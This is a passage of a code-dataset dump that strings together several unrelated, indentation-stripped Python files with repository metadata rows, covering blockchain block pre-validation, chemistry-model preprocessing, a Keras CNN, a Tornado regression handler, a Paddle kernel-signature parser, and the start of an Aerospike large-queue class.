block_dict: Dict[bytes32, Union[FullBlock, HeaderBlock]] = {}
for i, block in enumerate(blocks):
block_dict[block.header_hash] = block
if not block_record_was_present[i]:
block_records.remove_block_record(block.header_hash)
recent_sb_compressed_pickled = {bytes(k): bytes(v) for k, v in recent_blocks_compressed.items()}
npc_results_pickled = {}
for k, v in npc_results.items():
npc_results_pickled[k] = bytes(v)
futures = []
# Pool of workers to validate blocks concurrently
for i in range(0, len(blocks), batch_size):
end_i = min(i + batch_size, len(blocks))
blocks_to_validate = blocks[i:end_i]
if any([len(block.finished_sub_slots) > 0 for block in blocks_to_validate]):
final_pickled = {bytes(k): bytes(v) for k, v in recent_blocks.items()}
else:
final_pickled = recent_sb_compressed_pickled
b_pickled: Optional[List[bytes]] = None
hb_pickled: Optional[List[bytes]] = None
previous_generators: List[Optional[bytes]] = []
for block in blocks_to_validate:
# We ONLY add blocks which are in the past, based on header hashes (which are validated later) to the
# prev blocks dict. This is important since these blocks are assumed to be valid and are used as previous
# generator references
prev_blocks_dict: Dict[uint32, Union[FullBlock, HeaderBlock]] = {}
curr_b: Union[FullBlock, HeaderBlock] = block
while curr_b.prev_header_hash in block_dict:
curr_b = block_dict[curr_b.prev_header_hash]
prev_blocks_dict[curr_b.header_hash] = curr_b
if isinstance(block, FullBlock):
assert get_block_generator is not None
if b_pickled is None:
b_pickled = []
b_pickled.append(bytes(block))
try:
block_generator: Optional[BlockGenerator] = await get_block_generator(block, prev_blocks_dict)
except ValueError:
return None
if block_generator is not None:
previous_generators.append(bytes(block_generator))
else:
previous_generators.append(None)
else:
if hb_pickled is None:
hb_pickled = []
hb_pickled.append(bytes(block))
futures.append(
asyncio.get_running_loop().run_in_executor(
pool,
batch_pre_validate_blocks,
constants_json,
final_pickled,
b_pickled,
hb_pickled,
previous_generators,
npc_results_pickled,
check_filter,
[diff_ssis[j][0] for j in range(i, end_i)],
[diff_ssis[j][1] for j in range(i, end_i)],
)
)
# Collect all results into one flat list
return [
PreValidationResult.from_bytes(result)
for batch_result in (await asyncio.gather(*futures))
for result in batch_result
]
def _run_generator(
constants_dict: bytes,
unfinished_block_bytes: bytes,
block_generator_bytes: bytes,
) -> Tuple[Optional[Err], Optional[bytes]]:
"""
Runs the CLVM generator from bytes inputs. This is meant to be called under a ProcessPoolExecutor, in order to
validate the heavy parts of a block (clvm program) in a different process.
"""
try:
constants: ConsensusConstants = dataclass_from_dict(ConsensusConstants, constants_dict)
unfinished_block: UnfinishedBlock = UnfinishedBlock.from_bytes(unfinished_block_bytes)
assert unfinished_block.transactions_info is not None
block_generator: BlockGenerator = BlockGenerator.from_bytes(block_generator_bytes)
assert block_generator.program == unfinished_block.transactions_generator
npc_result: NPCResult = get_name_puzzle_conditions(
block_generator,
min(constants.MAX_BLOCK_COST_CLVM, unfinished_block.transactions_info.cost),
cost_per_byte=constants.COST_PER_BYTE,
safe_mode=False,
)
if npc_result.error is not None:
return Err(npc_result.error), None
except ValidationError as e:
return e.code, None
except Exception:
return Err.UNKNOWN, None
return None, bytes(npc_result)
| 45.917379
| 117
| 0.665633
|
28b80ab8923fa4a057c4bf3c7a889ccc3db28b21
| 2,051
|
py
|
Python
|
aizynthfinder/training/preprocess_recommender.py
|
0x2b3bfa0/aizynthfinder
|
3f1536e8947adcfc8b2603709eecc7895e48d42d
|
[
"MIT"
] | 1
|
2021-11-19T04:32:51.000Z
|
2021-11-19T04:32:51.000Z
|
aizynthfinder/training/preprocess_recommender.py
|
0x2b3bfa0/aizynthfinder
|
3f1536e8947adcfc8b2603709eecc7895e48d42d
|
[
"MIT"
] | null | null | null |
aizynthfinder/training/preprocess_recommender.py
|
0x2b3bfa0/aizynthfinder
|
3f1536e8947adcfc8b2603709eecc7895e48d42d
|
[
"MIT"
] | null | null | null |
""" Module routines for pre-processing data for recommender training
"""
import argparse
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelBinarizer
from scipy import sparse
from aizynthfinder.training.utils import (
Config,
split_and_save_data,
reactants_to_fingerprint,
)
def _get_config():
parser = argparse.ArgumentParser(
"Tool to pre-process a template library to be used to train a recommender network"
)
parser.add_argument("config", help="the filename to a configuration file")
args = parser.parse_args()
return Config(args.config)
def _save_unique_templates(dataset, config):
dataset = dataset[["retro_template", "template_code"]]
dataset = dataset.drop_duplicates(subset="template_code", keep="first")
dataset.set_index("template_code", inplace=True)
dataset = dataset.sort_index()
dataset.to_hdf(config.filename("unique_templates"), "table")
def main():
""" Entry-point for the preprocess_recommender tool
"""
config = _get_config()
filename = config.filename("library")
dataset = pd.read_csv(
filename, index_col=False, header=None, names=config["library_headers"],
)
print("Dataset loaded, generating Labels...", flush=True)
lb = LabelBinarizer(neg_label=0, pos_label=1, sparse_output=True)
labels = lb.fit_transform(dataset["template_hash"])
split_and_save_data(labels, "labels", config)
print("Labels created and splitted, generating Inputs...", flush=True)
reactants = dataset["reactants"].to_numpy()
inputs = np.apply_along_axis(reactants_to_fingerprint, 0, [reactants], config)
inputs = sparse.lil_matrix(inputs.T).tocsr()
split_and_save_data(inputs, "inputs", config)
print("Inputs created and splitted, splitting Full Dataset...", flush=True)
split_and_save_data(dataset, "library", config)
print("Full Dataset splitted, creating unique template set", flush=True)
_save_unique_templates(dataset, config)
if __name__ == "__main__":
main()
| 31.553846
| 90
| 0.724525
|
f34f250d3d8239e6393e5ee5573fedb1a86aa533
| 3,866
|
py
|
Python
|
cipher/model_zoo/cnn_dist.py
|
nkl27/cipher
|
f7b5795cc7369a6b6811e0ee5f77c6892e327ab4
|
[
"MIT"
] | null | null | null |
cipher/model_zoo/cnn_dist.py
|
nkl27/cipher
|
f7b5795cc7369a6b6811e0ee5f77c6892e327ab4
|
[
"MIT"
] | null | null | null |
cipher/model_zoo/cnn_dist.py
|
nkl27/cipher
|
f7b5795cc7369a6b6811e0ee5f77c6892e327ab4
|
[
"MIT"
] | null | null | null |
from tensorflow import keras
def cnn_dist_model(input_shape, output_shape, activation='relu', units=[24, 32, 48, 64, 96 ], dropout=[0.1, 0.2, 0.3, 0.4, 0.5]):
"""
Creates a keras neural network with the architecture shown below. The architecture is chosen to promote learning in a distributive way.
Parameters
----------
input_shape: tuple
Tuple of size (L,4) where L is the sequence lenght and 4 is the number of 1-hot channels. Assumes all sequences have equal length.
output_shape: int
Number of output categories.
activation: str
A string specifying the type of activation. Example: 'relu', 'exponential', ...
units: list
Optional parameter. A list of 5 integers that can be used to specify the number of filters. It provide more external control of the architecture.
dropout: list
Optional parameter. A list of length 5 with probabilities [prob, prob, prob, prob, prob] that can be used to externally control the probabilities of dropouts in the main architecture.
Returns
----------
A keras model instance.
Example
-----------
model = cnn_dist_model( (200,4), 1 , 'relu', [24, 32, 48, 64, 96 ], [0.1, 0.2, 0.3, 0.4, 0.5] )
"""
# input layer
inputs = keras.layers.Input(shape=input_shape)
# block 1
nn = keras.layers.Conv1D(filters=units[0],
kernel_size=19,
padding='same',
activation=activation,
kernel_regularizer=keras.regularizers.l2(1e-6))(inputs)
nn = keras.layers.BatchNormalization()(nn)
nn = keras.layers.Dropout(dropout[0])(nn)
# layer 2
nn = keras.layers.Conv1D(filters=units[1],
kernel_size=7,
padding='same',
activation='relu',
kernel_regularizer=keras.regularizers.l2(1e-6)) (nn)
nn = keras.layers.BatchNormalization()(nn)
nn = keras.layers.Dropout(dropout[1])(nn)
nn = keras.layers.MaxPool1D(pool_size=4)(nn)
# layer 3
nn = keras.layers.Conv1D(filters=units[2],
kernel_size=7,
padding='valid',
activation='relu',
kernel_regularizer=keras.regularizers.l2(1e-6)) (nn)
nn = keras.layers.BatchNormalization()(nn)
nn = keras.layers.Dropout(dropout[2])(nn)
nn = keras.layers.MaxPool1D(pool_size=4)(nn)
# layer 4
nn = keras.layers.Conv1D(filters=units[3],
kernel_size=3,
padding='valid',
activation='relu',
kernel_regularizer=keras.regularizers.l2(1e-6))(nn)
nn = keras.layers.BatchNormalization()(nn)
nn = keras.layers.Dropout(dropout[3])(nn)
nn = keras.layers.MaxPool1D(pool_size=3,
strides=3,
padding='same'
)(nn)
# layer 5
nn = keras.layers.Flatten()(nn)
nn = keras.layers.Dense(units=units[4], activation='relu', kernel_regularizer=keras.regularizers.l2(1e-6)) (nn)
nn = keras.layers.BatchNormalization()(nn)
nn = keras.layers.Dropout(dropout[4])(nn)
# Output layer
logits = keras.layers.Dense(output_shape, activation='linear', use_bias=True)(nn)
outputs = keras.layers.Activation('sigmoid')(logits)
# compile model
model = keras.Model(inputs=inputs, outputs=outputs)
return model
| 38.66
| 194
| 0.539317
|
fbcd892c43991d12a935861e3d405a2715e5c239
| 8,782
|
py
|
Python
|
backend/handlers/predictions.py
|
Bob620/superman-web
|
e13ae7305962cd348c2af74485ffa3e0b6855c02
|
[
"MIT"
] | null | null | null |
backend/handlers/predictions.py
|
Bob620/superman-web
|
e13ae7305962cd348c2af74485ffa3e0b6855c02
|
[
"MIT"
] | null | null | null |
backend/handlers/predictions.py
|
Bob620/superman-web
|
e13ae7305962cd348c2af74485ffa3e0b6855c02
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, print_function, division
import logging
import numpy as np
import os
from tornado import gen
from .generic_models import GenericModelHandler, async_crossval, axes_grid
from ..models import REGRESSION_MODELS
class RegressionModelHandler(GenericModelHandler):
def get(self, fignum):
'''Download predictions as CSV.'''
fig_data = self.get_fig_data(int(fignum))
if fig_data is None:
self.write('Oops, something went wrong. Try again?')
return
if fig_data.last_plot != 'regression_preds':
self.write('No plotted data to download.')
return
all_ds = self.request_many_ds()
if not all_ds:
self.write('No datasets selected.')
return
# collect primary keys for row labels
all_pkeys = []
for ds in all_ds:
dv = ds.view(mask=fig_data.filter_mask[ds])
all_pkeys.extend(dv.get_primary_keys())
# get data from the scatterplots
names, actuals, preds = [], [], []
for ax in fig_data.figure.axes:
if not ax.collections:
break
names.append(ax.get_title())
scat = ax.collections[0]
actual, pred = scat.get_offsets().T
preds.append(pred)
# HACK: if there are 6 lines on the plot, it's a boxplot, and thus
# there are no actual values to report. Instead, they're random jitter.
if len(ax.lines) == 6:
actual.fill(np.nan)
actuals.append(actual)
fname = os.path.basename(self.request.path)
self.set_header('Content-Type', 'text/plain')
self.set_header('Content-Disposition',
'attachment; filename='+fname)
# first header line: spectrum,foo,,bar,,baz,
self.write('Spectrum,' + ',,'.join(names) + ',\n')
# secondary header: ,Actual,Pred,Actual,Pred,Actual,Pred
self.write(',' + ','.join(['Actual,Pred']*len(names)) + '\n')
if actuals and preds:
actuals = np.column_stack(actuals)
preds = np.column_stack(preds)
for key, aa, pp in zip(all_pkeys, actuals, preds):
row = ','.join('%g,%g' % t for t in zip(aa, pp))
self.write('%s,%s\n' % (key, row))
self.finish()
@gen.coroutine
def post(self):
res = self.validate_inputs()
if res is None:
return
fig_data, all_ds_views, ds_kind, wave, X = res
variables = self.collect_variables(all_ds_views,
self.get_arguments('pred_meta[]'))
regress_kind = self.get_argument('regress_kind')
variate_kind = self.get_argument('variate_kind')
model_cls = REGRESSION_MODELS[regress_kind][variate_kind]
params = dict(pls=int(self.get_argument('pls_comps')),
lasso=float(self.get_argument('lasso_alpha')),
lars=int(self.get_argument('lars_num_channels')))
do_train = self.get_argument('do_train', None)
if do_train is None:
if len(variables) == 0:
self.visible_error(400, "No variables to predict.")
return
no_crossval = (len(variables) > 1 and variate_kind == 'multi' and
regress_kind == 'lasso')
if no_crossval:
msg = "Cross validation for %svariate %s is not yet supported." % (
variate_kind, regress_kind.title())
self.visible_error(400, msg)
return
# set up cross validation info
folds = int(self.get_argument('cv_folds'))
stratify_meta = self.get_argument('cv_stratify', '')
if stratify_meta:
vals, _ = self.collect_one_variable(all_ds_views, stratify_meta)
_, stratify_labels = np.unique(vals, return_inverse=True)
else:
stratify_labels = None
num_vars = 1 if variate_kind == 'multi' else len(variables)
cv_args = (X, variables)
cv_kwargs = dict(num_folds=folds, labels=stratify_labels)
logging.info('Running %d-fold (%s) cross-val for %s', folds,
stratify_meta, model_cls.__name__)
if regress_kind == 'pls':
comps = np.arange(int(self.get_argument('cv_min_comps')),
int(self.get_argument('cv_max_comps')) + 1)
cv_kwargs['comps'] = comps
plot_kwargs = dict(xlabel='# components')
elif regress_kind == 'lasso':
plot_kwargs = dict(xlabel='alpha', logx=True)
else:
chans = np.arange(int(self.get_argument('cv_min_chans')),
int(self.get_argument('cv_max_chans')) + 1)
cv_kwargs['chans'] = chans
plot_kwargs = dict(xlabel='# channels')
# run the cross validation
yield gen.Task(async_crossval, fig_data, model_cls, num_vars, cv_args,
cv_kwargs, **plot_kwargs)
return
if bool(int(do_train)):
# train on all the data
model = model_cls(params[regress_kind], ds_kind, wave)
logging.info('Training %s on %d inputs, predicting %d vars',
model, X.shape[0], len(variables))
model.train(X, variables)
fig_data.pred_model = model
else:
# use existing model
model = fig_data.pred_model
if model.ds_kind != ds_kind:
logging.warning('Mismatching model kind. Expected %r, got %r', ds_kind,
model.ds_kind)
# use the model's variables, with None instead of actual values
dummy_vars = {key: (None, name) for key, name in
zip(model.var_keys, model.var_names)}
# use the actual variables if we have them
for key in model.var_keys:
if key in variables:
dummy_vars[key] = variables[key]
variables = dummy_vars
# make sure we're using the same wavelengths
if wave.shape != model.wave.shape or not np.allclose(wave, model.wave):
if wave[-1] <= model.wave[0] or wave[0] >= model.wave[-1]:
self.visible_error(400, "Data to predict doesn't overlap "
"with training wavelengths.")
return
Xnew = np.empty((X.shape[0], model.wave.shape[0]), dtype=X.dtype)
for i, y in enumerate(X):
Xnew[i] = np.interp(model.wave, wave, y)
X = Xnew
# get predictions for each variable
preds, stats = model.predict(X, variables)
# plot
_plot_actual_vs_predicted(preds, stats, fig_data.figure, variables)
fig_data.manager.canvas.draw()
fig_data.last_plot = 'regression_preds'
res = dict(stats=stats, info=fig_data.pred_model.info_html())
self.write_json(res)
class ModelPlottingHandler(GenericModelHandler):
def post(self):
res = self.validate_inputs()
if res is None:
return
fig_data, all_ds_views, ds_kind, wave, X = res
model = fig_data.pred_model
all_bands, all_coefs = model.coefficients()
# Do the plot
fig_data.figure.clf(keep_observers=True)
ax1 = fig_data.figure.gca()
ax1.plot(wave, X.T, 'k-', alpha=0.5, lw=1)
ax2 = ax1.twinx()
ax2.axhline(lw=1, ls='--', color='gray')
size = 20 * float(self.get_argument('line_width'))
alpha = float(self.get_argument('alpha'))
for name, x, y in zip(model.var_names, all_bands, all_coefs):
ax2.scatter(x, y, label=name, s=size, alpha=alpha)
if bool(int(self.get_argument('legend'))) and len(model.var_names) > 1:
ax2.legend()
fig_data.manager.canvas.draw()
fig_data.last_plot = 'regression_coefs'
def _plot_actual_vs_predicted(preds, stats, fig, variables):
fig.clf(keep_observers=True)
axes = axes_grid(fig, len(preds), 'Actual', 'Predicted')
for i, key in enumerate(sorted(preds)):
ax = axes[i]
y, name = variables[key]
p = preds[key].ravel()
ax.set_title(name)
# validate y
if y is not None:
mask = np.isfinite(y)
nnz = np.count_nonzero(mask)
if nnz == 0:
y = None
elif nnz < len(y):
y, p = y[mask], p[mask]
if y is not None:
# actual values exist, so plot them
ax.scatter(y, p)
xlims = ax.get_xlim()
ylims = ax.get_ylim()
ax.errorbar(y, p, yerr=stats[i]['rmse'], fmt='none', ecolor='k',
elinewidth=1, capsize=0, alpha=0.5, zorder=0)
# plot best fit line
xylims = [np.min([xlims, ylims]), np.max([xlims, ylims])]
best_fit = np.poly1d(np.polyfit(y, p, 1))(xylims)
ax.plot(xylims, best_fit, 'k--', alpha=0.75, zorder=-1)
ax.set_aspect('equal')
ax.set_xlim(xylims)
ax.set_ylim(xylims)
else:
# no actual values exist, so only plot the predictions
ax.boxplot(p, showfliers=False)
# overlay jitter plot
x = np.ones_like(p) + np.random.normal(scale=0.025, size=len(p))
ax.scatter(x, p, alpha=0.9)
routes = [
(r'/_run_regression', RegressionModelHandler),
(r'/([0-9]+)/regression_predictions\.csv', RegressionModelHandler),
(r'/_plot_model_coefs', ModelPlottingHandler),
]
| 36.74477
| 79
| 0.625598
|
9e112cafc8514980ad5b73c100cb42cada82744f
| 3,394
|
py
|
Python
|
tools/infrt/get_compat_kernel_signature.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 11
|
2016-08-29T07:43:26.000Z
|
2016-08-29T07:51:24.000Z
|
tools/infrt/get_compat_kernel_signature.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | null | null | null |
tools/infrt/get_compat_kernel_signature.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 1
|
2021-12-09T08:59:17.000Z
|
2021-12-09T08:59:17.000Z
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import json
skip_list = ["adam_sig.cc", "adamw_sig.cc"]
def is_grad_kernel(kernel_info):
kernel_name = kernel_info.split(",")[0]
if kernel_name.endswith("_grad"):
return True
return False
def parse_compat_registry(kernel_info):
name, inputs_str, attrs_str, outputs_str = kernel_info.split(",{")
kernel_info = {}
kernel_info["inputs"] = inputs_str[:-1].split(",")
kernel_info["attrs"] = attrs_str[:-1].split(",")
kernel_info["outputs"] = outputs_str[:-1].split(",")
return name, kernel_info
def remove_grad_registry(kernels_registry):
clean_kernel_registry = {}
for registry in kernels_registry:
if (not "_grad" in registry):
clean_kernel_registry[registry] = kernels_registry[registry]
return clean_kernel_registry
def get_compat_kernels_info():
kernels_info = {}
compat_files = os.listdir("../../paddle/phi/ops/compat")
for file_ in compat_files:
if not ".cc" in file_:
compat_files.remove(file_)
for file_ in compat_files:
if file_ in skip_list:
continue
with open("../../paddle/phi/ops/compat/" + file_) as in_file:
txt = in_file.readlines()
content = ""
registry = False
for line in txt:
if ("KernelSignature(" in line):
content = ""
registry = True
if (registry):
content += line
if (registry and ";" in line):
data = content.replace("\n", "").replace(
" ",
"").strip("return").strip("KernelSignature(").strip(
"\);").replace("\"", "").replace("\\", "")
registry = False
if is_grad_kernel(data):
continue
name, registry_info = parse_compat_registry(data)
if name in kernels_info:
cur_reg = kernels_info[name]
kernels_info[name]["inputs"] = list(
set(registry_info["inputs"] +
kernels_info[name]["inputs"]))
kernels_info[name]["attrs"] = list(
set(registry_info["attrs"] +
kernels_info[name]["attrs"]))
kernels_info[name]["outputs"] = list(
set(registry_info["outputs"] +
kernels_info[name]["outputs"]))
else:
kernels_info[name] = registry_info
compat_registry_ = remove_grad_registry(kernels_info)
return compat_registry_
| 36.891304
| 76
| 0.560401
|
e7e1f43af2e4ba2e33de780ac026d1551c6558b4
| 91
|
py
|
Python
|
without_pkg_resources.py
|
scopatz/import-profiling
|
13e5a8b4cce573191c4b7526ff11e91ab261c6e0
|
[
"BSD-3-Clause"
] | 1
|
2017-10-12T11:52:33.000Z
|
2017-10-12T11:52:33.000Z
|
without_pkg_resources.py
|
scopatz/import-profiling
|
13e5a8b4cce573191c4b7526ff11e91ab261c6e0
|
[
"BSD-3-Clause"
] | null | null | null |
without_pkg_resources.py
|
scopatz/import-profiling
|
13e5a8b4cce573191c4b7526ff11e91ab261c6e0
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
sys.modules['pkg_resources'] = None
import pygments.styles
import prompt_toolkit
| 22.75
| 35
| 0.835165
|
a3452f9666aadd1d7d07bd4dfaa6a11f43833b72
| 1,205
|
py
|
Python
|
py_proj/server.py
|
maryno-net/py-project
|
a8db26494087a9a290553ba0bfaa692c9000dde1
|
[
"MIT"
] | null | null | null |
py_proj/server.py
|
maryno-net/py-project
|
a8db26494087a9a290553ba0bfaa692c9000dde1
|
[
"MIT"
] | null | null | null |
py_proj/server.py
|
maryno-net/py-project
|
a8db26494087a9a290553ba0bfaa692c9000dde1
|
[
"MIT"
] | null | null | null |
"""
py_proj.server
~~~~~~~~~~~~~~
Модуль серверных приложений.
"""
import sys
from gunicorn.app.base import Application
class FlaskGunicornApplication(Application):
"""Gunicorn-приложение для py_proj."""
def __init__(self, app, config, *args, **kwargs):
#: Flask-приложение
self.app = app
#: Словарь настроек приложения
self.config = config
# Предотвращаем передачу аргументов команды в приложение
sys.argv = [sys.argv[0]]
super(FlaskGunicornApplication, self).__init__(*args, **kwargs)
def init(self, parser, opts, args):
"""Инициализирует конфигурацию приложения.
Метод переопределяет родительский для использования конфигурации,
с которой было инициализировано приложение.
:param parser: Объект argparse.ArgumentParser конфигурации.
:param opts: Опции командной строки.
:param args: Аргументы командной строки.
"""
return self.config
def load(self):
"""Загружает приложение.
Метод переопределяет родительский для возврата Flask-приложения,
с которым было инициализировано приложение.
"""
return self.app
| 28.023256
| 73
| 0.656432
|
ca0acfa933231de70a3c5a2d92cae9f4fd3e1ec9
| 865
|
py
|
Python
|
preprocess/MLDCTD.py
|
bmd2007/benchmark_eval
|
aa42bb3369e79db4cb63e1963afcc8af6d8f5696
|
[
"MIT"
] | 1
|
2022-01-11T08:03:32.000Z
|
2022-01-11T08:03:32.000Z
|
preprocess/MLDCTD.py
|
bmd2007/benchmark_eval
|
aa42bb3369e79db4cb63e1963afcc8af6d8f5696
|
[
"MIT"
] | null | null | null |
preprocess/MLDCTD.py
|
bmd2007/benchmark_eval
|
aa42bb3369e79db4cb63e1963afcc8af6d8f5696
|
[
"MIT"
] | null | null | null |
import sys, os
currentdir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(currentdir)
from CTD_Composition import CTD_Composition
from CTD_Distribution import CTD_Distribution
from CTD_Transition import CTD_Transition
from PreprocessUtils import STDecode
from PreprocessUtils import MLDEncode
#default groups are based on conjoint triad method
def MLDCTD(fastas, numSplits=4, groupings = ['AGV','ILFP','YMTS','HNQW','RK','DE','C'], deviceType='cpu'):
encoded, encodedSize = MLDEncode(fastas,numSplits)
comp = CTD_Composition(encoded,groupings,deviceType)
tran = CTD_Transition(encoded,groupings,deviceType)
dist = CTD_Distribution(encoded,groupings,deviceType)
comp = STDecode(comp,encodedSize)
tran = STDecode(tran,encodedSize)
dist = STDecode(dist,encodedSize)
return (comp, tran, dist)
| 27.03125
| 107
| 0.752601
|
ca47b0e99a0953643c1ae5ba2b89367f35409dad
| 552
|
py
|
Python
|
molecule/default/tests/test_default.py
|
sys-fs/ansible-role-varnish
|
0dcea0da0013c705478aba36107fb6c0ac4de47e
|
[
"MIT"
] | null | null | null |
molecule/default/tests/test_default.py
|
sys-fs/ansible-role-varnish
|
0dcea0da0013c705478aba36107fb6c0ac4de47e
|
[
"MIT"
] | null | null | null |
molecule/default/tests/test_default.py
|
sys-fs/ansible-role-varnish
|
0dcea0da0013c705478aba36107fb6c0ac4de47e
|
[
"MIT"
] | null | null | null |
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
def test_package(host):
pkg = host.package('varnish')
assert pkg.is_installed
def test_service(host):
service = host.service('varnish')
assert service.is_running
def test_secret(host):
secret = host.file('/etc/varnish/secret')
assert secret.exists
assert secret.mode == 0o400
assert secret.user == 'root'
assert secret.group == 'root'
| 21.230769
| 63
| 0.721014
|
bef5da146c6478b80a0c2285d70e76df93284b90
| 25,099
|
py
|
Python
|
large_queue.py
|
neelp-git/aerospike-large-queue
|
82dc3bff0dcb94065905f9ccf566f01eaa2e127c
|
[
"Apache-2.0"
] | 2
|
2020-09-03T06:26:38.000Z
|
2021-06-23T22:28:00.000Z
|
large_queue.py
|
neelp-git/aerospike-large-queue
|
82dc3bff0dcb94065905f9ccf566f01eaa2e127c
|
[
"Apache-2.0"
] | null | null | null |
large_queue.py
|
neelp-git/aerospike-large-queue
|
82dc3bff0dcb94065905f9ccf566f01eaa2e127c
|
[
"Apache-2.0"
] | null | null | null |
# large_queue.py
"""
LargeQueue
The implementation provides a rough solution for certain issues when implementing a FIFO queue or a circular buffer
in Aerospike.
1. Large queue size. The List data type in Aerospike can be easily leveraged to implement a queue. However
the maximum Aerospike record size is 8MB which is the outer limit of the queue size thus implemented.
LargeQueue allows an arbitrarily sized queue by using multiple records.
2. Consistency across multiple records. In Aerospike, single record operations are atomic. Queue operations are
performed under a queue lock to preserve consistency across multiple records.
- Slow clients and client failures. A new lock request will break the old lock if it is timed out.
- Operations whose lock is broken. Updates are prevented from committing if their lock is broken by
checking if the lock is still held before committing new head/tail pointers in the metadata record.
- Rollback of failed updates (broken locks). A rollback of an update is not necessary as a commit happens
in a final atomic step on a single metadata record where the head/tail pointers are updated.
3. Fencing to guard against lingering invalid writes. An enqueue operation whose lock is broken is prevented from
overwriting a subsequent valid enqueue entry by use of a fencing marker in the record. Only writes
with a higher fencing token than the last fencing marker in the record are allowed.
4. Efficient operations. With a circular buffer implementation, head/tail pointers can be advanced monotonically
without costly copy and space management.
- Offset based access to entries. A monotonically increasing offset indicates the position of an entry
in the queue, and an entry can be read using a valid offset without acquiring a lock.
Design
The FIFO queue is implemented as a circular buffer using a "metadata" record that holds queue metadata such as the
lock info and head/tail positions and several "buffer" records that hold the entries in the queue.
The head points to the first entry and the tail points to position AFTER the last entry. An empty and full queue
point to the same physical position in the circular buffer, the difference being that the head and tail offsets
are different for a full queue by the circular buffer size.
An enqueue and dequeue operation acquire the lock in the metadata record, read or write the head or tail entry,
and in the last step atomically release the lock and update head/tail pointer. A lock that has expired is
broken by a new lock request and the lock is granted to the requester. The old requester cannot commit as
the commit step checks that the lock is still held by the requester; if not, the request is aborted. Similarly,
the old requester is prevented from overwriting a valid entry with a fencing scheme. Each enqueue request gets a
monotonically increasing fencing token, and updates the buffer record with fencing token as it appends
the new entry. An older enqueue operation with a smaller fencing token than in the record is disallowed.
The enqueue operation allows the circular buffer to be overwritten when the queue is full with the
parameter "overwrite_if_full" parameter. By default, this parameter is False and an exception is raised.
A monotonically increasing queue "offset" is maintained and an entry can be read with a valid offset (that is,
between head and tail positions) with "get_entry_by_offset". This function requires no lock and offers no
guarantee that an entry exists or has not been removed at that offset.
The "transaction-id" required to assign the lock needs to be unique across all concurrent requests. It need not
be unique across operations that are not concurrent.
Potential future enhancements
- Allow many consumer groups each with its own tracking metadata.
- Separate namepaces to store metatdata and buffer records. Performance can benefit by storing the metadata
namspace in faster persistent storage (like PMEM).
- Extend metadata record to hold recent committed transactions for the ability to ascertain status by
transaction-id when various failures make an operation outcome unknown and the operation cannot
be simply resubmitted.
"""
from __future__ import print_function
import time
import aerospike
from aerospike import predexp as predexp
from aerospike import exception as exception
from aerospike_helpers.operations import operations as op_helpers
from aerospike_helpers.operations import list_operations as list_helpers
class ASAborted(Exception):
def __init__(self, reason):
self.reason = reason
class LargeQueue(object):
META_REC_KEY = 'queue-metadata'
BUF_REC_KEY_PREFIX = 'queue-buffer-'
LOCK_MAX_RETRIES = 3
LOCK_POLL_WAIT_MS = 100
LOCK_EXPIRATION_MS = 200
# Enum for queue operations implemented as class variables
class Ops:
Dequeue = 1
Enqueue = 2
@staticmethod
def _buf_record_key(rec_index):
return LargeQueue.BUF_REC_KEY_PREFIX + str(rec_index)
@staticmethod
def _curr_time_milliseconds():
return int(time.time() * 1000)
def __init__(self):
"""
The null constructor.
"""
self.client = None
self.namespace = None
self.name = None
self.slots_per_rec = None
self.num_buf_recs = None
self.initialized = False
@staticmethod
def _get_metadata(client, namespace, q_name):
"""
Get the metadata record.
:param client: client object returned by aerospike.connect()
:param namespace: namespace where the queue records are stored
:param q_name: name of the queue, used as the "set" name
:return: metadata record if queue exists, otherwise None
"""
metadata_key = (namespace, q_name, LargeQueue.META_REC_KEY)
try:
(key, meta, record) = client. get(metadata_key)
except exception.RecordNotFound as ex:
return None
return record
def get_queue_info(self):
"""
Get queue info.
:return: a dict with externally visible attributes of the queue
"""
if not self.initialized:
return None
record = LargeQueue._get_metadata(self.client, self.namespace, self.name)
return { 'name': self.name,
'max-size': self.num_buf_recs * self.slots_per_rec,
'namespace': self.namespace,
'head-offset': long(record['head-offset']),
'tail-offset': long(record['tail-offset']) }
def _create_metadata_record(self):
"""
Create a metadata record for a new queue.
:throws: ASAborted('Queue already exists')
"""
# create the metadata record
write_policy = { 'exists': aerospike.POLICY_EXISTS_CREATE,
'key': aerospike.POLICY_KEY_SEND }
metadata_key = (self.namespace, self.name, LargeQueue.META_REC_KEY)
metadata_bins = { 'locked': 0,
'lock-owner': None,
'lock-time-ms': None,
'head-offset': 0,
'tail-offset': 0,
'fencing-ctr': 0,
'num-buf-recs': self.num_buf_recs,
'slots-per-rec': self.slots_per_rec }
try:
self.client. put(metadata_key, metadata_bins, write_policy)
except exception.RecordExistsError as ex:
raise ASAborted('Queue already exists')
return
def _create_buf_records(self):
"""
Create buffer records for a new queue.
"""
# insert buffer records
write_policy = { 'exists': aerospike.POLICY_EXISTS_CREATE_OR_REPLACE,
'key': aerospike.POLICY_KEY_SEND }
buf_bins = { 'fencing-mark': 0,
'entries': [] }
for i in range(self.slots_per_rec):
buf_bins['entries'].append({ 'offset': -1, 'value': None })
for i in range(self.num_buf_recs):
buf_key = (self.namespace, self.name, LargeQueue._buf_record_key(i))
_ = self.client. put(buf_key, buf_bins, write_policy)
return
def _reset_fencing_marks(self):
"""
Reset the fencing marker in buffer and metadata records when the fencing counter in metadata record wraps
around to a non-positive value. While like to be very infrequent, if at all necessary, operation
(a long fencing counter should make it unnecessary), it is critical for it to succeed.
